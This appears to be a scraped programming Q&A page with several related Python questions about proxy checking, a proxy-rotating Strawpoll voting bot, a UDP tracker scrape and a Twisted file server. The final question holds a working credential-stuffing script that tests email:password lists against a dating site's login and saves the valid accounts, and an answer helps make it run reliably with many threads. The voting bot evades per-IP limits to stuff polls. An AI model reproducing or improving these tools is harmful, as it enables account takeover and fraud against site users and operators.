text file processing with python

I have a text file which contains proxy IPs, looking like the following:
130.14.29.111:80
130.14.29.120:80
130.159.235.31:80
14.198.198.220:8909
141.105.26.183:8000
160.79.35.27:80
164.77.196.75:80
164.77.196.78:45430
164.77.196.78:80
173.10.134.173:8081
174.132.145.80:80
174.137.152.60:8080
174.137.184.37:8080
174.142.125.161:80
After checking each proxy, I want to mark the results like this:
total number of '0' = 8
total number of 'x' = 6
percentage = alive 57% , dead 43%
x 130.14.29.111:80
0 130.14.29.120:80
0 130.159.235.31:80
0 14.198.198.220:8909
0 141.105.26.183:8000
0 160.79.35.27:80
x 164.77.196.75:80
x 164.77.196.78:45430
x 164.77.196.78:80
0 173.10.134.173:8081
0 174.132.145.80:80
0 174.137.152.60:8080
x 174.137.184.37:8080
x 174.142.125.161:80
How can this be done with Python? A sample would be much appreciated!
Edit: this is the script source of what I have. The checked proxies are saved to 'proxy_alive.txt'; in this file I want to mark whether each proxy element is alive or not.
import socket
import sys
import threading
import urllib2
import Queue

socket.setdefaulttimeout(7)
print "Bobng's proxy checker. Using %s second timeout" % (socket.getdefaulttimeout())

#input_file = sys.argv[1]
#proxy_type = sys.argv[2]  # options: http, s4, s5
#output_file = sys.argv[3]
input_file = 'proxylist.txt'
proxy_type = 'http'
output_file = 'proxy_alive.txt'
url = "www.seemyip.com"  # Don't put http:// in here, or any /'s

check_queue = Queue.Queue()
output_queue = Queue.Queue()
threads = 20

def writer(f, rq):
    while True:
        line = rq.get()
        f.write(line + '\n')

def checker(q, oq):
    while True:
        proxy_info = q.get()  # ip:port
        if proxy_info is None:
            print "Finished"
            return
        #print "Checking %s" % proxy_info
        if proxy_type == 'http':
            try:
                listhandle = open("proxylist.txt").read().split('\n')
                for line in listhandle:
                    saveAlive = open("proxy_alive.txt", 'a')
                    details = line.split(':')
                    email = details[0]
                    password = details[1].replace('\n', '')
                    proxy_handler = urllib2.ProxyHandler({'http': proxy_info})
                    opener = urllib2.build_opener(proxy_handler)
                    opener.addheaders = [('User-agent', 'Mozilla/5.0')]
                    urllib2.install_opener(opener)
                    req = urllib2.Request("http://www.google.com")
                    sock = urllib2.urlopen(req, timeout=7)
                    rs = sock.read(1000)
                    if '<title>Google</title>' in rs:
                        oq.put(proxy_info)
                        print '[+] alive proxy', proxy_info
                        saveAlive.write(line)
                saveAlive.close()
            except urllib2.HTTPError, e:
                print 'url open error? slow?'
                pass
            except Exception, detail:
                print '[-] bad proxy', proxy_info
        else:
            # gotta be socks; requires the third-party SocksiPy module ('import socks')
            try:
                s = socks.socksocket()
                if proxy_type == "s4":
                    t = socks.PROXY_TYPE_SOCKS4
                else:
                    t = socks.PROXY_TYPE_SOCKS5
                ip, port = proxy_info.split(':')
                s.setproxy(t, ip, int(port))
                s.connect((url, 80))
                oq.put(proxy_info)
                print proxy_info
            except Exception, error:
                print proxy_info

threading.Thread(target=writer, args=(open(output_file, "wb"), output_queue)).start()
for i in xrange(threads):
    threading.Thread(target=checker, args=(check_queue, output_queue)).start()
for line in open(input_file).readlines():
    check_queue.put(line.strip('\n'))
print "File reading done"
for i in xrange(threads):
    check_queue.put(None)
raw_input("PRESS ENTER TO QUIT")
sys.exit(0)

You can use a queue to hold the list of addresses and their meta information. After you are done with your checks on the IP addresses, you can write the results back to the same file in 'w' mode, e.g. as a list of tuples:
[(ip-address-1, 'x'), (ip-address-2, '0'), ...]
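A minimal sequential sketch of that idea (Python 2, to match the question's code; the plain TCP connect is a stand-in assumption for a full HTTP check through each proxy, and proxylist.txt is assumed non-empty):

import socket

def check(proxy):  # returns '0' for alive, 'x' for dead
    ip, port = proxy.split(':')
    s = socket.socket()
    s.settimeout(7)
    try:
        s.connect((ip, int(port)))  # crude liveness test: can we open a TCP connection?
        return '0'
    except Exception:
        return 'x'
    finally:
        s.close()

proxies = [line.strip() for line in open('proxylist.txt') if line.strip()]
results = [(check(p), p) for p in proxies]

alive = sum(1 for mark, _ in results if mark == '0')
dead = len(results) - alive
out = open('proxylist.txt', 'w')  # write the marks back to the same file, as suggested
out.write("total number of '0' = %d\n" % alive)
out.write("total number of 'x' = %d\n" % dead)
out.write("percentage = alive %.0f%% , dead %.0f%%\n" % (100.0 * alive / len(results),
                                                         100.0 * dead / len(results)))
for mark, p in results:
    out.write('%s %s\n' % (mark, p))
out.close()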

Related

Python Proxy Request Failed Connection

I'm trying to make a Strawpoll bot. I found something on GitHub and took it, but it's not able to connect to a proxy server: either I get a timeout or it says "Couldn't connect to proxy". I took HTTPS proxies from a free list.
It's not my code (it's from here), and my Python skills are very limited.
I hope someone can help me.
This is the code (or download the whole zip here):
#!/usr/bin/env python
try:
    from xml.dom import minidom
    import xml.etree.cElementTree as ET
    from optparse import OptionParser
    import sys
    import os
except ImportError as msg:
    print("[-] Library not installed: " + str(msg))
    exit()

try:
    import requests
except ImportError:
    print("[-] Missing library 'requests'")
    print("[*] Please install missing library with: pip install requests")

# Creator: Luis Hebendanz
class Main:
    # SETTINGS
    maxVotes = 1
    voteFor = ""
    surveyId = ""

    # GLOBAL VARIABLES
    proxyListFile = "D:\Feko Karels\Documents\Informatik Kram\Python\strawpoll-voting-bot-master\https-proxy-list.xml"
    saveStateFile = "saveState.xml"
    proxyTimeout = 10  # Seconds
    currentProxyPointer = 0
    successfulVotes = 0

    def __init__(self):
        try:
            ###
            # Command line argument parser
            ###
            parser = OptionParser()
            parser.add_option("-v", "--votes", action="store", type="string", dest="votes", help="number of votes to give")
            parser.add_option("-s", "--survey", action="store", type="string", dest="survey", help="id of the survey")
            parser.add_option("-t", "--target", action="store", type="string", dest="target", help="checkbox to vote for")
            parser.add_option("-f", "--flush", action="store_true", dest="flush", help="Deletes skipping proxy list")
            (options, args) = parser.parse_args()

            if len(sys.argv) > 2:
                if options.votes is None:
                    print("[-] Number of votes not defined with: -v ")
                    exit(1)
                if options.survey is None:
                    print("[-] Survey id not defined with: -s")
                    exit(1)
                if options.target is None:
                    print("[-] Target to vote for is not defined with: -t")
                    exit(1)
                try:
                    self.maxVotes = int(options.votes)
                except ValueError:
                    print("[-] Please define an integer for -v")

                # Save arguments into global variable
                self.voteFor = options.target
                self.surveyId = options.survey

                # Flush saveState.xml
                if options.flush == True:
                    print("[*] Flushing saveState.xml file...")
                    os.remove(self.saveStateFile)
            # Print help
            else:
                print("[-] Not enough arguments given")
                print()
                parser.print_help()
                exit()

            # Read proxy list file
            alreadyUsedProxy = False
            xmldoc = minidom.parse(self.proxyListFile)
            taglist = xmldoc.getElementsByTagName('para')
            tagList2 = None

            # Check if saveState.xml exists and read file
            if os.path.isfile(self.saveStateFile):
                xlmSave = minidom.parse(self.saveStateFile)
                tagList2 = xlmSave.getElementsByTagName("usedProxy")

            # Print remaining proxies
            if tagList2 is not None:
                print("[*] Number of remaining proxies in list: " + str(len(taglist) - len(tagList2)))
                print()
            else:
                print("[*] Number of proxies in new list: " + str(len(taglist)))
                print()

            # Go through proxy list
            for tag in taglist:
                # Check if max votes has been reached
                if self.successfulVotes >= self.maxVotes:
                    break

                # Increase number of used proxy integer
                self.currentProxyPointer += 1

                # Read value out of proxy list
                tagValue = tag.childNodes[0].nodeValue

                # Read in saveState.xml if this proxy has already been used
                if tagList2 is not None:
                    for tag2 in tagList2:
                        if tagValue == tag2.childNodes[0].nodeValue:
                            alreadyUsedProxy = True
                            break

                # If it has been used print message and continue to next proxy
                if alreadyUsedProxy == True:
                    print("[" + str(self.currentProxyPointer) + "] Skipping proxy: " + tagValue)
                    alreadyUsedProxy = False
                    continue

                # Print current proxy information
                print("[" + str(self.currentProxyPointer) + "] New proxy: " + tagValue)
                print("[*] Connecting... ")

                # Connect to strawpoll and send vote
                self.sendToWebApi('https://' + tagValue)

                # Write used proxy into saveState.xml
                self.writeUsedProxy(tagValue)
                print()

            # Check if max votes has been reached
            if self.successfulVotes >= self.maxVotes:
                print("[+] Finished voting: " + str(self.successfulVotes))
            else:
                print("[+] Finished every proxy!")
            exit()
        except IOError as ex:
            print("[-] " + ex.strerror + ": " + ex.filename)
        except KeyboardInterrupt as ex:
            print("[*] Saving last proxy...")
            print("[*] Programm aborted")
            exit()

    def getClientIp(self, httpProxy):
        proxyDictionary = {"https": httpProxy}
        rsp = requests.get("https://api.ipify.org/", proxies=proxyDictionary)
        return str(rsp.text)

    def writeUsedProxy(self, proxyIp):
        if os.path.isfile(self.saveStateFile):
            # Read file
            tree = ET.parse(self.saveStateFile)
            # Get <root> tag
            root = tree.getroot()
            child = ET.Element("usedProxy")
            child.text = str(proxyIp)
            root.append(child)
            # Write to file
            tree.write(self.saveStateFile, encoding="UTF-8")
        else:
            # Create <root> tag
            root = ET.Element("article")
            # Get element tree
            tree = ET.ElementTree(root)
            # Write to file
            tree.write(self.saveStateFile, encoding="UTF-8")
            # Now write defined entry into file
            self.writeUsedProxy(proxyIp)

    def sendToWebApi(self, httpsProxy):
        try:
            headers = \
                {
                    'Host': 'strawpoll.de',
                    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0',
                    'Accept': '*/*',
                    'Accept-Language': 'de,en-US;q=0.7,en; q=0.3',
                    'Referer': 'https://strawpoll.de/' + self.surveyId,
                    'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
                    'X-Requested-With': 'XMLHttpRequest',
                    'Content-Length': '29',
                    'Cookie': 'lang=de',
                    'DNT': '1',
                    'Connection': 'close'
                }
            payload = {'pid': self.surveyId, 'oids': self.voteFor}
            proxyDictionary = {"https": httpsProxy}

            # Connect to server
            r = requests.post('https://strawpoll.de/vote', data=payload, headers=headers, proxies=proxyDictionary, timeout=self.proxyTimeout)
            json = r.json()

            # Check if succeeded
            if bool(json['success']):
                print("[+] Successfully voted.")
                self.successfulVotes += 1
                return True
            else:
                print("[-] Voting failed. This Ip already voted.")
                return False
        except requests.exceptions.Timeout as ex:
            print("[-] Timeout")
            return False
        except requests.exceptions.ConnectionError as ex:
            print("[-] Couldn't connect to proxy")
            return False
        except Exception as ex:
            print(str(ex))
            return False

# Execute main
Main()
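Since the errors are timeouts and proxy connection failures, the first thing to rule out is dead proxies from the free list. A minimal, hedged pre-check using the requests API the bot already relies on (api.ipify.org is the same echo service the script's getClientIp() calls, and the 'https://' + address proxy format mirrors what the bot passes to sendToWebApi()):

import requests

def proxy_is_alive(proxy, timeout=10):
    # 'proxy' is an "ip:port" string, as in the bot's proxy list.
    try:
        rsp = requests.get("https://api.ipify.org/",
                           proxies={"https": "https://" + proxy},
                           timeout=timeout)
        return rsp.status_code == 200
    except requests.exceptions.RequestException:
        return False

print(proxy_is_alive("127.0.0.1:8080"))  # hypothetical address; expect False unless a proxy runs there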

UDP tracker scrape request returns zero for all hashes

I successfully managed to connect to the tracker. After the connection is established, I send a scrape request. The tracker returns a response with the right byte order, but the (seeders, leechers, completed) info for the torrent is always zero, which seems wrong.
I suspect an info-hash encoding problem, but I couldn't come up with a solution. I use the following Python code for scraping.
import os
import bencode
import struct
import socket
import urlparse
import binascii

def loadFile(f_name):
    user_home = os.path.expanduser('~')
    path = user_home + '/completetorrent/data/' + f_name
    return open(path, 'rb')

def getSocket():
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(8)
    return sock

def getConnection(url):
    parsed = urlparse.urlparse(url)
    hostname = socket.gethostbyname(parsed.hostname)
    port = parsed.port
    return (hostname, port)

def main():
    f = loadFile('test1.torrent')
    decoded = bencode.bdecode(f.read())

    # Connect request starts
    buff = ''
    buff += struct.pack('!q', 0x41727101980)
    buff += struct.pack('!i', 0)
    buff += struct.pack('!i', 123456789)
    sock = getSocket()
    conn = getConnection("udp://tracker.coppersurfer.tk:6969/announce")
    sock.sendto(buff, conn)

    # Connect response starts
    response = sock.recvfrom(4096)[0]
    assert len(response) == 16, 'response len must be bigger than 16 but %d' % len(response)
    if struct.unpack('!i', response[0:4])[0] != 0:
        raise ValueError('Bad response')
    struct.unpack('!i', response[4:8])  # ignore transaction id

    # Scrape request starts
    con_id = struct.unpack('!q', response[8:16])[0]
    buff = ''
    buff += struct.pack('!q', con_id)
    buff += struct.pack('!i', 2)
    buff += struct.pack('!i', 123456)
    hash_ = decoded['info']['pieces'][0:20]
    buff += struct.pack('!20s', hash_)
    sock.sendto(buff, conn)

    # Scrape response starts
    response = sock.recvfrom(4096)[0]
    if struct.unpack('!i', response[0:4])[0] != 2:
        raise ValueError('Bad scrape response')
    struct.unpack('!i', response[4:8])  # ignore transaction id
    seedrs = struct.unpack('!i', response[8:12])
    completed = struct.unpack('!i', response[12:16])
    leechers = struct.unpack('!i', response[16:20])
    print seedrs, completed, leechers

main()
Convert the info_hash to a hex value.
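A note on the likely root cause (an assumption, not part of the answer above): the scrape request packs decoded['info']['pieces'][0:20], but the info_hash a tracker expects is the SHA-1 digest of the bencoded info dictionary. A minimal sketch using the same bencode module, with the digest hex-encoded for inspection:

import hashlib
import binascii
import bencode

# 'decoded' is the bdecoded torrent from the question's main();
# info_hash = SHA-1 of the bencoded 'info' dict, raw 20 bytes go into the scrape packet
info_hash = hashlib.sha1(bencode.bencode(decoded['info'])).digest()
print binascii.hexlify(info_hash)  # hex form, e.g. for comparing against a magnet link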

Check server status on Twisted

While I was writing a simple message-based file server and client, I got the idea of checking the file server's status, but I don't know how to realize it: just try to connect and disconnect from the server (and how do I disconnect immediately when the server is not running, if I go this way)? Or do Twisted/Autobahn have some facility that reports server status without creating a "full connection"?
a) fileserver.py
import os
import sys
import json
from twisted.internet import reactor
from autobahn.twisted.websocket import WebSocketServerFactory, WebSocketServerProtocol, listenWS

CONFIG_TEMPLATE = ''
CONFIG_DATA = {}

class MessageBasedServerProtocol(WebSocketServerProtocol):
    """
    Message-based WebSockets server
    Template contains some parts as string:
    [USER_ID:OPERATION_NAME:FILE_ID] - 15 symbols for USER_ID,
                                       10 symbols for OPERATION_NAME,
                                       25 symbols for FILE_ID
    other - some data
    """
    def __init__(self):
        path = CONFIG_DATA['path']
        base_dir = CONFIG_DATA['base_dir']
        # prepare to work with files...
        if os.path.exists(path) and os.path.isdir(path):
            os.chdir(path)
            if not os.path.exists(base_dir) or not os.path.isdir(base_dir):
                os.mkdir(base_dir)
            os.chdir(base_dir)
        else:
            os.makedirs(path)  # was os.makedir(), which does not exist in the os module
            os.chdir(path)
            os.mkdir(base_dir)
            os.chdir(base_dir)
        # init some things
        self.fullpath = path + '/' + base_dir

    def __checkUserCatalog(self, user_id):
        # prepare to work with files...
        os.chdir(self.fullpath)
        if not os.path.exists(user_id) or not os.path.isdir(user_id):
            os.mkdir(user_id)
            os.chdir(user_id)
        else:
            os.chdir(self.fullpath + '/' + user_id)

    def onOpen(self):
        print "[USER] User with %s connected" % (self.transport.getPeer())

    def connectionLost(self, reason):
        print '[USER] Lost connection from %s' % (self.transport.getPeer())

    def onMessage(self, payload, isBinary):
        """
        Process request from user and send response
        """
        user_id, cmd, file_id = payload[:54].replace('[', '').replace(']', '').split(':')
        data = payload[54:]
        operation = "UNK"  # WRT -> Write, REA -> Read, DEL -> Delete, UNK -> Unknown
        status = "C"       # C -> Complete, E -> Error in operation
        commentary = 'Succesfull!'
        # write file into user storage
        if cmd == 'WRITE_FILE':
            self.__checkUserCatalog(user_id)
            operation = "WRT"
            try:
                f = open(file_id, "wb")
                f.write(data)
            except IOError, argument:
                status = "E"
                commentary = argument
            except Exception, argument:
                status = "E"
                commentary = argument
                raise Exception(argument)
            finally:
                f.close()
        # read some file
        elif cmd == 'READU_FILE':
            self.__checkUserCatalog(user_id)
            operation = "REA"
            try:
                f = open(file_id, "rb")
                commentary = f.read()
            except IOError, argument:
                status = "E"
                commentary = argument
            except Exception, argument:
                status = "E"
                commentary = argument
                raise Exception(argument)
            finally:
                f.close()
        # delete file from storage (and in main server, in parallel delete from DB)
        elif cmd == 'DELET_FILE':
            self.__checkUserCatalog(user_id)
            operation = "DEL"
            try:
                os.remove(file_id)
            except IOError, argument:
                status = "E"
                commentary = argument
            except Exception, argument:
                status = "E"
                commentary = argument
                raise Exception(argument)
        self.sendMessage('[%s][%s]%s' % (operation, status, commentary), isBinary=True)

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print "using python fileserver_client.py [PATH_TO_config.json_FILE]"
    else:
        # read config file
        CONFIG_TEMPLATE = sys.argv[1]
        with open(CONFIG_TEMPLATE, "r") as f:
            CONFIG_DATA = json.load(f)
        # create server
        factory = WebSocketServerFactory("ws://localhost:9000")
        factory.protocol = MessageBasedServerProtocol
        listenWS(factory)
        reactor.run()
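As an aside, the fixed-width header described in the protocol docstring is exactly 54 bytes, which is why onMessage slices payload[:54]. A quick sanity check with hypothetical IDs padded to the documented widths:

# 1 ('[') + 15 (USER_ID) + 1 (':') + 10 (OPERATION_NAME) + 1 (':') + 25 (FILE_ID) + 1 (']') = 54
header = '[' + 'u00000000000001' + ':' + 'WRITE_FILE' + ':' + '0' * 21 + '.log' + ']'
assert len(header) == 54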
b) client.py
import json
import sys
import commands
from twisted.internet import reactor
from autobahn.twisted.websocket import WebSocketClientFactory, WebSocketClientProtocol, connectWS

CONFIG_TEMPLATE = ''
CONFIG_DATA = {}

class MessageBasedClientProtocol(WebSocketClientProtocol):
    """
    Message-based WebSockets client
    Template contains some parts as string:
    [USER_ID:OPERATION_NAME:FILE_ID] - 15 symbols for USER_ID,
                                       10 symbols for OPERATION_NAME,
                                       25 symbols for FILE_ID
    other - some data
    """
    def onOpen(self):
        user_id = CONFIG_DATA['user']
        operation_name = CONFIG_DATA['cmd']
        file_id = CONFIG_DATA['file_id']
        src_file = CONFIG_DATA['src_file']
        data = '[' + str(user_id) + ':' + str(operation_name) + ':' + str(file_id) + ']'
        if operation_name == 'WRITE_FILE':
            with open(src_file, "r") as f:
                info = f.read()
            data += str(info)
        self.sendMessage(data, isBinary=True)

    def onMessage(self, payload, isBinary):
        cmd = payload[1:4]
        result_cmd = payload[6]
        if cmd in ('WRT', 'DEL'):
            print payload
        elif cmd == 'REA':
            if result_cmd == 'C':
                try:
                    data = payload[8:]
                    f = open(CONFIG_DATA['src_file'], "wb")
                    f.write(data)
                except IOError, e:
                    print e
                except Exception, e:
                    raise Exception(e)
                finally:
                    print payload[:8] + "Successfully!"
                    f.close()
            else:
                print payload
        reactor.stop()

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print "using python fileserver_client.py [PATH_TO_config.json_FILE]"
    else:
        # read config file
        CONFIG_TEMPLATE = sys.argv[1]
        with open(CONFIG_TEMPLATE, "r") as f:
            CONFIG_DATA = json.load(f)
        # connection to server
        factory = WebSocketClientFactory("ws://localhost:9000")
        factory.protocol = MessageBasedClientProtocol
        connectWS(factory)
        reactor.run()
I found a solution to this issue: use callLater or deferLater to disconnect from the server if we can't connect; when everything is OK, just take the server status that it reports.
import sys
from twisted.internet.task import deferLater
from twisted.internet import reactor
from autobahn.twisted.websocket import WebSocketClientFactory, WebSocketClientProtocol, connectWS

CONFIG_IP = ''
CONFIG_PORT = 9000

def isOffline(status):
    print status

class StatusCheckerProtocol(WebSocketClientProtocol):
    def __init__(self):
        self.operation_name = "STATUS_SRV"
        self.user_id = 'u00000000000000'
        self.file_id = "000000000000000000000.log"

    def onOpen(self):
        data = '[' + str(self.user_id) + ':' + str(self.operation_name) + ':' + str(self.file_id) + ']'
        self.sendMessage(data, isBinary=True)

    def onMessage(self, payload, isBinary):
        cmd = payload[1:4]
        result_cmd = payload[6]
        data = payload[8:]
        print data
        reactor.stop()

if __name__ == '__main__':
    if len(sys.argv) < 3:
        print "using python statuschecker.py [IP] [PORT]"
    else:
        # read preferences
        CONFIG_IP = sys.argv[1]
        CONFIG_PORT = int(sys.argv[2])
        server_addr = "ws://%s:%d" % (CONFIG_IP, CONFIG_PORT)
        # connection to server
        factory = WebSocketClientFactory(server_addr)
        factory.protocol = StatusCheckerProtocol
        connectWS(factory)
        # create a special Deferred, which disconnects us from the server if we can't connect within 3 seconds
        d = deferLater(reactor, 3, isOffline, 'OFFLINE')
        d.addCallback(lambda ignored: reactor.stop())
        # run all system...
        reactor.run()
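Usage, assuming the file server above may or may not be listening on port 9000:

python statuschecker.py 127.0.0.1 9000

If the server is up, it answers the STATUS_SRV message (with its generic '[UNK][C]...' response, since STATUS_SRV is not one of its file commands), onMessage prints the returned data, and the reactor stops; if nothing has connected within 3 seconds, the deferLater callback fires instead, prints 'OFFLINE', and stops the reactor.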

python proxy list check

(Same question as "text file processing with python" above: mark each proxy in a list file as alive ('0') or dead ('x'), with totals and percentages.)
Is this what you want?
#!/usr/bin/env python
import Queue
import threading
import urllib2
import time

input_file = 'proxylist.txt'
threads = 10
queue = Queue.Queue()
output = []

class ThreadUrl(threading.Thread):
    """Threaded Url Grab"""
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue

    def run(self):
        while True:
            # grabs host from queue
            proxy_info = self.queue.get()
            try:
                proxy_handler = urllib2.ProxyHandler({'http': proxy_info})
                opener = urllib2.build_opener(proxy_handler)
                opener.addheaders = [('User-agent', 'Mozilla/5.0')]
                urllib2.install_opener(opener)
                req = urllib2.Request("http://www.google.com")
                sock = urllib2.urlopen(req, timeout=7)
                rs = sock.read(1000)
                if '<title>Google</title>' in rs:
                    output.append(('0', proxy_info))
                else:
                    raise Exception("Not Google")  # was: raise "Not Google" (string exceptions are invalid)
            except:
                output.append(('x', proxy_info))
            # signals to queue job is done
            self.queue.task_done()

start = time.time()

def main():
    # spawn a pool of threads, and pass them queue instance
    for i in range(5):
        t = ThreadUrl(queue)
        t.setDaemon(True)
        t.start()
    hosts = [host.strip() for host in open(input_file).readlines()]
    # populate queue with data
    for host in hosts:
        queue.put(host)
    # wait on the queue until everything has been processed
    queue.join()

main()
for proxy, host in output:
    print proxy, host
print "Elapsed Time: %s" % (time.time() - start)

python thread queue question

Hello all.
I made a Python script with threads which checks whether some accounts exist on a website.
If I run it with 1 thread it works well, but if I increase the thread count to around 3~5 and above, the results differ from the single-thread run; I checked manually, and with more threads the results are not correct.
I think some of my threading code needs tuning, or should I use the Queue module?
Can anyone advise on or tune my script? Thanks in advance!
# -*- coding: cp949 -*-
import sys, os
import mechanize, urllib
import cookielib
import re
from BeautifulSoup import BeautifulSoup, BeautifulStoneSoup, Tag
import re, sys, os, mechanize, urllib, threading, time

# Maximum number of process to spawn at any one given time.
MAX_PROCS = 5
maillist = "daum.txt"
threads = []
SAVEFILE = 'valid_joyhunt.txt'

# Threading class
class CheckMyThread(threading.Thread):
    llemail = ""
    llpassword = ""

    def __init__(self, lemail, lpassword):
        self.llemail = lemail
        self.llpassword = lpassword
        threading.Thread.__init__(self)

    def run(self):
        valid = []
        llemail = self.llemail
        llpassword = self.llpassword
        try:
            params = urllib.urlencode({'userid': llemail, 'passwd': llpassword})
            rq = mechanize.Request("http://www.joyhunting.com/include/member/login_ok1.asp", params)
            rs = mechanize.urlopen(rq)
            data = rs.read()
            logged_in = r'var _id' in data  # successful login (comment translated from Korean)
            if logged_in:
                rq = mechanize.Request("http://www.joyhunting.com/myjoy/new_myjoy.asp")
                rs = mechanize.urlopen(rq)
                maindata = rs.read(50024)
                jun_member = r"준회원"  # Korean for "associate member"
                save = open(SAVEFILE, 'a')
                for match in re.finditer(r'<td height="28" colspan="2" style="PADDING-left: 16px">현재 <strong>(.*?)</strong>', maindata):
                    matched = match.group(1)
                    for match2 in re.finditer(r"var _gd(.*?);", data):
                        matched2 = match2.group(1)
                        print '%s, %s' % (matched, matched2)
                        break
                rq1 = mechanize.Request("http://www.joyhunting.com/webchat/applyweb/sendmessage_HPCK_step1.asp?reURL=1&myid=" + llemail + "&ToID=undefined&hide=undefined")
                rs1 = mechanize.urlopen(rq1)
                sendmsg = rs1.read()
                #print sendmsg
                match3 = ''
                for match3 in re.finditer(r":'\+(.*?)\);", sendmsg):
                    matched3 = match3.group(1)
                    #print matched3
                    print 'bad'
                    break
                if match3 == '':
                    save.write('%s, %s, %s:%s ' % (matched, matched2, llemail, llpassword + '\n'))
                    save.close()
                    print '[+] Checking: %s:%s -> Good!' % (llemail, llpassword)
                else:
                    print '[-] Checking: %s:%s -> bad account!' % (llemail, llpassword)
                return 0
        except:
            print '[!] Exception checking %s.' % (llemail)
            return 1
        return 0

try:
    listhandle = open(maillist)
# Bail out if the file doesn't exist
except:
    print '[!] %s does not exist. Please create the file!' % (maillist)
    exit(2)

# Loop through the file
for line in listhandle:
    # Parse the line
    try:
        details = line.split(':')
        email = details[0]
        password = details[1].replace('\n', '')
    # Throw an error and exit.
    except:
        print '[!] Parse Error in %s on line %n.' % (maillist, currline)
        exit
    # Run a while statement:
    if len(threads) < MAX_PROCS:
        # Fork out into another process
        print '[ ] Starting thread to check account %s.' % (email)
        thread = CheckMyThread(email, password)
        thread.start()
        threads.append(thread)
    else:
        # Wait for a thread to exit.
        gonext = 0
        while 1 == 1:
            i = 0
            #print '[ ] Checking for a thread to exit...'
            while i < len(threads):
                #print '[ ] %d' % (i)
                try:
                    if threads[i]:
                        if not threads[i].isAlive():
                            #print '[-] Thread %d is dead' % (i)
                            threads.pop(i)
                            print '[ ] Starting thread to check account %s.' % (email)
                            thread = CheckMyThread(email, password)
                            thread.start()
                            threads.append(thread)
                            gonext = 1
                            break
                        else:
                            #print '[+] Thread %d is still running' % (i)
                            pass
                    else:
                        print '[ ] Crap.'
                except NameError:
                    print '[ ] AWWW COME ON!!!!'
                i = i + 1
            time.sleep(0.050)
            if gonext:
                break
Can you please specify what the different results are?
From what I see, the code is doing much more than verifying accounts.
From what I see, you're appending to a single file from multiple threads; I'd say that's not thread-safe.
Also, AFAIK mechanize uses shared cookie storage for all requests, so concurrent threads are probably interfering with each other. Use a separate mechanize.Browser() inside run() instead of mechanize.Request().
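A hedged sketch combining both suggestions: a per-thread mechanize.Browser() (its own cookie storage, so logins don't interfere) and a lock around the shared results file. The URL, form fields, and the 'var _id' login check are taken from the question; the rest is illustrative:

import threading
import urllib
import mechanize

save_lock = threading.Lock()  # serializes writes to the shared output file

class CheckAccountThread(threading.Thread):
    def __init__(self, email, password):
        threading.Thread.__init__(self)
        self.email = email
        self.password = password

    def run(self):
        br = mechanize.Browser()  # per-thread Browser: separate cookies per login
        br.set_handle_robots(False)
        params = urllib.urlencode({'userid': self.email, 'passwd': self.password})
        data = br.open("http://www.joyhunting.com/include/member/login_ok1.asp", params).read()
        if 'var _id' in data:  # successful login, same check as the original script
            with save_lock:  # only one thread writes at a time
                with open('valid_joyhunt.txt', 'a') as save:
                    save.write('%s:%s\n' % (self.email, self.password))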
